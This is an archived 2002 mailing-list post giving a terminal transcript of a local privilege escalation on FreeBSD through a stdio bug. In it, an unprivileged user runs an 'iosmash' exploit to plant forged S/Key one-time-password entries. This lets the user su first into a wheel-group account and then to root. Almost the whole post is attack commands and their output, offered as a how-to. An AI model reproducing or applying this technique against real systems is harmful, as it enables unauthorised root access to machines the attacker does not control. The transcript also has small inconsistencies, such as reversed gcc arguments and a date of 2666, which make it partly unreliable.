from phased.... I didnt think such would be necessary but due to the high volume of emails it has proved so, below is a transcript of exploiting the stdio bug on freebsd as a user not in the wheel group Welcome to FreeBSD! > id uid=1000(d0tslash) gid=1000(d0tslash) groups=1000(d0tslash) > > grep wheel /etc/group wheel:*:0:root,akt0r-root,misterx > > perl -pi -e 's/root /misterx /g' iosmash.c > gcc -o iosmash.c iosmash >./iosmash Adding d0tslash: <--- HIT CTRL-C ---> > grep 98 iosmash.c s/key 98 snosoft2 98: MASS OAT ROLL TOOL AGO CAM "\nmisterx 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:0 3\n"); > su misterx s/key 98 snosoft2 Password:MASS OAT ROLL TOOL AGO CAM %pwd /usr/home/d0tslash %id uid=1001(misterx) gid=1001(misterx) groups=1001(misterx), 0(wheel), 1006(cvsusers) %cd ~ %grep "root " iosmash.c decided to make a trivial exploit to easily get root :) "\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n"); %gcc -o iosmash iosmash.c %./iosmash Updating misterx: Old key: snosoft2 <--- HIT CTRL-C ---> %su s/key 98 snosoft2 Password:MASS OAT ROLL TOOL AGO CAM xes#
This archive was generated by hypermail 2b30 : Wed Apr 24 2002 - 13:59:22 PDT